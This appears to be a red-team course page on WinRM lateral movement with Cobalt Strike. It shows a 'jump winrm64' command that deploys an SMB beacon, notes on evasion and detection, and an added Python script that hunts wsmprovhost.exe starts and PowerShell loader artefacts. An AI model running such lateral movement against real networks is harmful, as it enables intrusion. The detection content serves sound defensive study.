Windows Remote Management

The winrm and winrm64 methods can be used for 32- and 64-bit targets as appropriate.

The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well.

beacon> jump winrm64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web.dev.cyberbotic.io via WinRM
[+] host called home, sent: 225172 bytes
[+] established link to child beacon: 10.10.122.30


WinRM will return a high integrity Beacon running as the user you're interacting with the remote machine as.


This new Beacon will be running inside wsmprovhost.exe, which is the "Host process for WinRM plug-ins". This is used whenever WinRM is used, legitimate or otherwise. You can search for process start events, but this will produce a lot of false positives if WinRM is being used legitimately by system administrators.


The most likely means of identifying this lateral movement is by searching PowerShell script block logs for known payload artefacts.
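The two detection routes described above, the noisy wsmprovhost.exe process start search and the more reliable PowerShell script block search, can be combined so that a process start is only surfaced when the same user on the same host also produced a suspicious script block. The following is an added example written for this page, not code from the course or from Cobalt Strike. It runs over constructed event records shaped like Sysmon Event ID 1 / Security 4688 process-creation events and PowerShell Event ID 4104 script block events; the field names (`EventID`, `Computer`, `Image`, `ParentImage`, `User`, `ScriptBlockText`) and the loader-style artefact patterns are assumptions to be adapted to your own SIEM schema and known payload indicators.

```python
"""Hunting WinRM lateral movement in Windows event data.

Added example, not part of the original page. The events below are
CONSTRUCTED to resemble Sysmon EventID 1 / Security 4688 process-creation
records and PowerShell 4104 script block records. Field names are an
assumed SIEM-style normalisation, not any product's exact schema.
"""
import re

SAMPLE_EVENTS = [
    # Legitimate admin WinRM session: wsmprovhost.exe starts, benign script block.
    {"EventID": 1, "Computer": "web", "Image": r"C:\Windows\System32\wsmprovhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": "DEV\\admin"},
    {"EventID": 4104, "Computer": "web", "User": "DEV\\admin",
     "ScriptBlockText": "Get-Service -Name Spooler | Restart-Service"},
    # Suspicious session: wsmprovhost.exe starts, then a loader-style script block.
    {"EventID": 1, "Computer": "web", "Image": r"C:\Windows\System32\wsmprovhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": "DEV\\nlamb"},
    {"EventID": 4104, "Computer": "web", "User": "DEV\\nlamb",
     "ScriptBlockText": "$x=[Convert]::FromBase64String('AAAA...'); ... VirtualAlloc ... IEX"},
    # Unrelated process start; must not be flagged.
    {"EventID": 1, "Computer": "web", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "DEV\\admin"},
]

# Generic in-memory loader heuristics (assumption: replace with your own known
# payload artefacts and tune to what is normal in your environment).
ARTEFACT_PATTERNS = [
    re.compile(r"FromBase64String", re.I),
    re.compile(r"VirtualAlloc", re.I),
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
]


def winrm_host_starts(events):
    """Noisy first pass: every wsmprovhost.exe process-creation event (ID 1 or 4688).
    This fires for legitimate administrator WinRM use as well."""
    return [e for e in events
            if e.get("EventID") in (1, 4688)
            and e.get("Image", "").lower().endswith("\\wsmprovhost.exe")]


def script_block_hits(events, min_matches=2):
    """Script block (4104) events whose text matches at least `min_matches`
    artefact patterns; requiring more than one pattern cuts single-keyword noise."""
    hits = []
    for e in events:
        if e.get("EventID") != 4104:
            continue
        text = e.get("ScriptBlockText", "")
        matched = [p.pattern for p in ARTEFACT_PATTERNS if p.search(text)]
        if len(matched) >= min_matches:
            hits.append({"Computer": e["Computer"], "User": e["User"], "matched": matched})
    return hits


def correlate(events):
    """Keep only (Computer, User) pairs that both started wsmprovhost.exe and
    logged a suspicious script block, which removes most admin false positives."""
    suspicious = {(h["Computer"], h["User"]) for h in script_block_hits(events)}
    starts = {(e["Computer"], e["User"]) for e in winrm_host_starts(events)}
    return sorted(starts & suspicious)


if __name__ == "__main__":
    print("wsmprovhost starts:", len(winrm_host_starts(SAMPLE_EVENTS)))
    print("script block hits:", script_block_hits(SAMPLE_EVENTS))
    print("correlated:", correlate(SAMPLE_EVENTS))
```

Run over the constructed events, the first pass returns both wsmprovhost.exe starts (the admin's and the suspicious one), while `correlate` returns only the `DEV\nlamb` session, which is the one a script block search would have found anyway; the value of the correlation is the host and user context for the process start, which 4104 alone does not tie to a WinRM session. The `min_matches` threshold is the knob to adjust if one of your artefact patterns also appears in legitimate administrative scripts.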
